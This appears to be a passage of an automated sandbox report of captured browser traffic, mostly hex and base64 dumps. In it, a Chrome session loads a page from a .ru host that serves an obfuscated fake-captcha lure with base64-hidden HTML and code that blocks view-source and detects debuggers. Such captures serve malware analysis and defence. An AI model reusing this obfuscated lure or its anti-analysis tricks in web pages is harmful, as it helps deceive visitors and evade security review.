                                                                  Data Ascii: b2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3h
                                                                  2024-12-20 05:19:18 UTC1378INData Raw: 74 34 32 66 2b 4d 70 30 79 55 54 56 51 62 64 57 73 41 48 56 73 69 6b 64 69 48 6b 48 61 50 78 63 51 58 51 75 66 58 67 55 42 67 4d 52 78 6d 65 39 55 30 41 41 78 66 48 34 76 46 76 6a 4d 37 65 46 36 55 6b 62 4a 53 35 71 6f 51 77 45 51 47 41 35 37 41 63 35 4a 6c 6c 46 79 55 56 5a 5a 35 63 6b 55 45 67 4d 56 78 73 4b 32 6a 6c 53 59 7a 49 2b 51 58 4a 73 69 79 6a 7a 4e 45 41 4a 79 4a 41 7a 62 2f 4b 51 61 34 31 6a 4a 4b 4c 38 70 4f 44 4d 51 69 54 45 41 79 6d 58 77 35 6e 38 2f 50 30 49 6a 44 33 62 68 37 52 67 6f 67 35 39 61 61 6e 78 69 49 52 54 56 76 56 2f 6f 6a 30 74 6e 48 63 61 2f 57 4d 72 56 77 4f 44 77 42 33 72 61 54 47 78 7a 6b 42 67 2f 67 6e 5a 56 61 70 46 56 36 32 57 79 32 6e 35 41 4f 37 30 48 4d 2f 35 77 62 4a 30 51 6e 58 79 51 53 61 56 50 44 49 75 4e 5a 7a
                                                                  Data Ascii: t42f+Mp0yUTVQbdWsAHVsikdiHkHaPxcQXQufXgUBgMRxme9U0AAxfH4vFvjM7eF6UkbJS5qoQwEQGA57Ac5JllFyUVZZ5ckUEgMVxsK2jlSYzI+QXJsiyjzNEAJyJAzb/KQa41jJKL8pODMQiTEAymXw5n8/P0IjD3bh7Rgog59aanxiIRTVvV/oj0tnHca/WMrVwODwB3raTGxzkBg/gnZVapFV62Wy2n5AO70HM/5wbJ0QnXyQSaVPDIuNZz
                                                                  2024-12-20 05:19:18 UTC847INData Raw: 36 73 64 34 32 39 54 55 4e 45 63 6d 55 64 63 2b 50 52 61 4c 48 63 76 6e 38 37 64 58 57 34 75 67 7a 64 73 61 47 78 75 66 4c 39 34 4e 46 76 39 7a 69 31 4a 37 47 56 62 68 6c 76 62 32 64 6e 61 4a 33 53 56 72 78 66 63 2b 6e 32 2b 4e 54 73 5a 37 2f 48 37 2f 4d 72 33 67 35 58 64 53 49 48 79 4a 53 48 31 50 5a 2b 37 66 54 6f 79 6c 32 2b 45 72 71 69 6c 67 5a 34 4e 61 4c 59 42 39 67 6f 56 47 61 48 6a 52 39 33 48 76 31 5a 72 55 34 58 44 73 46 54 32 30 6b 48 33 50 4f 62 7a 62 57 6b 30 43 67 47 31 6a 61 63 56 49 55 6e 41 51 62 39 46 2b 56 65 78 79 4c 4d 7a 6b 70 63 4c 76 30 49 4a 56 37 41 48 51 49 4f 43 41 55 59 48 78 37 76 35 71 67 53 63 6d 59 48 74 54 71 53 41 79 5a 4c 45 4a 54 4b 32 32 42 69 65 34 69 71 33 78 73 71 70 6d 34 53 41 66 39 48 71 39 61 32 44 6e 4a 34 75
                                                                  Data Ascii: 6sd429TUNEcmUdc+PRaLHcvn87dXW4ugzdsaGxufL94NFv9zi1J7GVbhlvb2dnaJ3SVrxfc+n2+NTsZ7/H7/Mr3g5XdSIHyJSH1PZ+7fToyl2+ErqilgZ4NaLYB9goVGaHjR93Hv1ZrU4XDsFT20kH3PObzbWk0CgG1jacVIUnAQb9F+VexyLMzkpcLv0IJV7AHQIOCAUYHx7v5qgScmYHtTqSAyZLEJTK22Bie4iq3xsqpm4SAf9Hq9a2DnJ4u


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449764104.21.49.704432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:23 UTC689OUTGET /3JCtG/ HTTP/1.1
                                                                  Host: 8g.tolirax.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://purogosouls.github.io/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:23 UTC1247INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 05:19:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm1sJYkkmJW859BD%2FXhGPFC4Sw6ue5HqCCoYn8bnXmtiuABlJti5rdnQymsGnxqRsSZbUifzWK7KVDKaZGflBi4u53legxPsMc%2B6FNKYFq3Gt%2FWt3hKwtrMOoGQxsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6971&min_rtt=1456&rtt_var=10668&sent=8&recv=9&lost=0&retrans=0&sent_bytes=4303&recv_bytes=2150&delivery_rate=1956043&cwnd=254&unsent_bytes=0&cid=90cad8a8b559477f&ts=316421&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik1DWnF3eVo0RmtGRjNmTGJVR0VPUHc9PSIsInZhbHVlIjoiKzIxaVB0RFZ3TGtCVU82cGJIcldHZnhnY1FxbkNTMzF0VnZSQmF6eEo4c1Iyb0VicTVGM0xwemNlRTFNWGt1NTFrMkJMc2VOanFyZE5kenVQbHNVR1BkNkdLUEZzc3YrN2NSVVRzazI2K1NFTTIxUXBiTWdKZ0ZjekNta21mc1QiLCJtYWMiOiJkZGY4MDk2N2NjYjFmMTViMDU0MjRjY2UwZTc2MDRjZTNjMzk5ZTZjY2U2ZWRjZWYyY2EzZTZjMzEwMjI5NWVkIiwidGFnIjoiIn0%3D; expires=Fri, 20-Dec-2024 07:19:23 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2024-12-20 05:19:23 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 49 4d 6a 63 7a 52 57 74 4a 4b 30 78 78 4e 46 42 72 56 31 5a 4d 52 32 4d 31 62 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 32 31 4b 55 46 42 6a 62 57 70 6c 64 6a 6c 71 62 48 52 69 59 7a 52 4d 4e 58 46 51 65 44 46 4a 57 56 5a 6f 55 6d 52 76 65 47 5a 6c 61 58 4a 6a 4d 31 4e 6a 63 79 74 4e 64 47 77 77 62 54 56 71 59 54 64 6b 52 31 46 48 4e 6b 64 46 64 6b 70 7a 4f 45 78 57 51 54 51 33 59 33 4a 71 51 58 6b 79 5a 46 46 4f 4d 6d 6c 51 52 6d 64 7a 4b 33 52 5a 53 45 46 4e 5a 46 4e 52 56 56 64 6c 63 6a 6c 68 55 31 4d 33 4e 32 4a 57 52 55 39 79 55 45 64 5a 52 55 68 6b 63 58 46 5a 4d 6e 4a 74 57 6e 5a 51 4f 53 39 72 57 57 4e 4f 65 47 6b
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlFIMjczRWtJK0xxNFBrV1ZMR2M1bmc9PSIsInZhbHVlIjoiR21KUFBjbWpldjlqbHRiYzRMNXFQeDFJWVZoUmRveGZlaXJjM1NjcytNdGwwbTVqYTdkR1FHNkdFdkpzOExWQTQ3Y3JqQXkyZFFOMmlQRmdzK3RZSEFNZFNRVVdlcjlhU1M3N2JWRU9yUEdZRUhkcXFZMnJtWnZQOS9rWWNOeGk
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 62 33 62 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 44 6f 6e 26 23 30 33 39 3b 74 20 62 65 20 61 66 72 61 69 64 20 74 6f 20 67 69 76 65 20 75 70 20 74 68 65 20 67 6f 6f 64 20 74 6f 20 67 6f 20 66 6f 72 20 74 68 65 20 67 72 65 61 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 34 52 79 35 30 62 32 78 70 63 6d 46 34 4c 6e 4a 31 4c 7a 4e 4b 51 33 52 48 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e
                                                                  Data Ascii: b3b<script>/* Don&#039;t be afraid to give up the good to go for the great. */if(atob("aHR0cHM6Ly84Ry50b2xpcmF4LnJ1LzNKQ3RHLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4N
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65
                                                                  Data Ascii: ogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxhe
                                                                  2024-12-20 05:19:23 UTC144INData Raw: 6c 59 32 74 69 62 33 67 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 70 6a 61 47 56 6a 61 32 56 6b 49 43 73 67 62 47 46 69 5a 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 0d 0a
                                                                  Data Ascii: lY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246I
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 31 38 61 31 0d 0a 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 48 4e 76 62 47 6c 6b 49 43 4d 30 59 32 46 6d 4e 54 41 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 64 70 5a 48 52 6f 4f 69 41 77 49 44 4e 77 65 43 41 7a 63 48 67 67 4d 44 73 4e 43 69 41 67 49 43 42 30 63 6d 46 75 63 32 5a 76 63 6d 30 36 49 48 4a 76 64 47 46 30 5a 53 67 30 4e 57 52 6c 5a 79 6b 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 58 52 6c 65 48
                                                                  Data Ascii: 18a1GFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleH
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 35 77 64 58 51 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 42 6a 59 57 78 6a 4b 44 45 77 4d 43 55 67 4c 53 41 79 4d 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f 69 41 31 63 48 67 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 67 30
                                                                  Data Ascii: Y29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW5wdXQgew0KICAgIHdpZHRoOiBjYWxjKDEwMCUgLSAyMHB4KTsNCiAgICBwYWRkaW5nOiA1cHg7DQogICAgZm9udC1zaXplOiAxNnB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCg0
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c
                                                                  Data Ascii: TIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2Rl
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 48 68 4d 64 57 39 56 65 46 4e 75 51 32 34 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 48 68 4d 64 57 39 56 65 46 4e 75 51 32 34 67 4c 53 42 42 62 31 6c 43 61 56 42 58 59 6b 6c 58 49 44 34 67 65 6e 46 42 55 33 4e 4b 52 6d 46 43 61 79 41 6d 4a 69 41 68 53 6e 42 33 59 57 46 75 65 45 5a 46 57 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 51 33 68 74 5a 48 42 4f 63 6c 52 35 64 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 4b 63 48 64 68 59 57 35 34 52 6b 56 61 49 44 30 67 64 48 4a 31 5a
                                                                  Data Ascii: AgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IHhMdW9VeFNuQ24gPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKHhMdW9VeFNuQ24gLSBBb1lCaVBXYklXID4genFBU3NKRmFCayAmJiAhSnB3YWFueEZFWikgew0KICAgICAgICAgICAgQ3htZHBOclR5diA9IHRydWU7DQogICAgICAgICAgICBKcHdhYW54RkVaID0gdHJ1Z
                                                                  2024-12-20 05:19:23 UTC837INData Raw: 45 62 30 46 42 51 6a 46 4e 51 55 46 42 4e 6d 31 42 51 55 46 45 63 56 6c 42 51 55 46 59 59 30 70 35 4e 6c 56 55 64 30 46 42 51 55 5a 34 56 55 56 34 56 56 4a 52 51 55 46 42 54 44 68 6e 53 56 41 72 4c 30 46 4e 54 57 74 49 54 56 56 70 53 48 4e 56 61 6b 6c 4e 56 57 6c 49 4f 46 56 70 53 44 68 56 61 6b 67 34 57 57 70 49 4f 45 31 70 53 48 5a 35 4f 45 45 76 63 54 68 42 64 6e 6b 34 51 6d 5a 31 4f 45 4a 51 63 54 6c 42 4c 33 55 34 51 6c 42 31 4e 30 4a 4e 55 57 6c 49 4f 46 46 73 52 79 39 31 4f 55 4a 51 65 54 68 42 4c 79 73 76 51 55 31 6a 61 6b 68 79 4f 47 64 4a 54 57 4e 70 53 48 4e 56 61 55 68 32 64 54 68 42 4c 33 6b 34 51 54 68 56 61 45 67 34 56 57 64 49 5a 6e 45 34 51 53 39 35 4b 30 45 34 57 57 6c 49 64 6e 55 35 51 6c 42 6c 4c 30 46 4e 59 32 70 4a 54 56 56 70 53 44
                                                                  Data Ascii: Eb0FBQjFNQUFBNm1BQUFEcVlBQUFYY0p5NlVUd0FBQUZ4VUV4VVJRQUFBTDhnSVArL0FNTWtITVVpSHNVaklNVWlIOFVpSDhVakg4WWpIOE1pSHZ5OEEvcThBdnk4QmZ1OEJQcTlBL3U4QlB1N0JNUWlIOFFsRy91OUJQeThBLysvQU1jakhyOGdJTWNpSHNVaUh2dThBL3k4QThVaEg4VWdIZnE4QS95K0E4WWlIdnU5QlBlL0FNY2pJTVVpSD
                                                                  2024-12-20 05:19:23 UTC1369INData Raw: 31 39 33 31 0d 0a 63 77 51 6e 64 6a 53 6b 4e 33 59 30 38 76 64 6d 4e 44 52 47 5a 46 53 6b 4e 52 52 55 38 76 5a 6a 4d 32 4b 79 39 72 53 6b 4a 6e 57 48 68 42 5a 33 59 34 4b 30 46 75 4e 45 52 51 53 55 38 35 5a 31 6c 4f 4c 31 42 76 51 6b 52 51 56 55 77 72 64 6c 6c 4f 4f 44 64 4c 5a 47 74 42 51 55 46 42 51 6c 6c 72 64 45 68 53 53 47 38 30 4d 56 6c 57 63 55 46 42 51 55 46 43 4d 31 4a 4b 56 46 56 56 53 44 5a 42 64 30 31 46 55 6b 46 56 4f 55 4a 73 64 57 35 52 51 55 46 44 62 47 78 4b 55 6b 56 47 56 57 56 4f 63 6e 51 79 5a 32 31 45 57 45 5a 56 55 6d 68 31 52 32 56 44 55 31 6c 52 52 58 42 73 5a 33 68 4c 51 6e 68 42 59 31 56 47 56 57 52 46 51 54 64 78 53 33 6c 76 64 32 6b 30 5a 31 70 70 51 58 55 79 57 6b 64 5a 56 6e 70 70 4f 48 55 76 64 47 78 6c 62 6e 42 31 5a 6d 56
                                                                  Data Ascii: 1931cwQndjSkN3Y08vdmNDRGZFSkNRRU8vZjM2Ky9rSkJnWHhBZ3Y4K0FuNERQSU85Z1lOL1BvQkRQVUwrdllOODdLZGtBQUFBQllrdEhSSG80MVlWcUFBQUFCM1JKVFVVSDZBd01FUkFVOUJsdW5RQUFDbGxKUkVGVWVOcnQyZ21EWEZVUmh1R2VDU1lRRXBsZ3hLQnhBY1VGVWRFQTdxS3lvd2k0Z1ppQXUyWkdZVnppOHUvdGxlbnB1ZmV


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449767151.101.66.1374432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:26 UTC619OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://8g.tolirax.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:26 UTC611INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 20 Dec 2024 05:19:26 GMT
                                                                  Age: 3193498
                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890091-NYC
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 55, 2
                                                                  X-Timer: S1734671966.359874,VS0,VE0
                                                                  Vary: Accept-Encoding
                                                                  2024-12-20 05:19:26 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2024-12-20 05:19:26 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                  2024-12-20 05:19:26 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
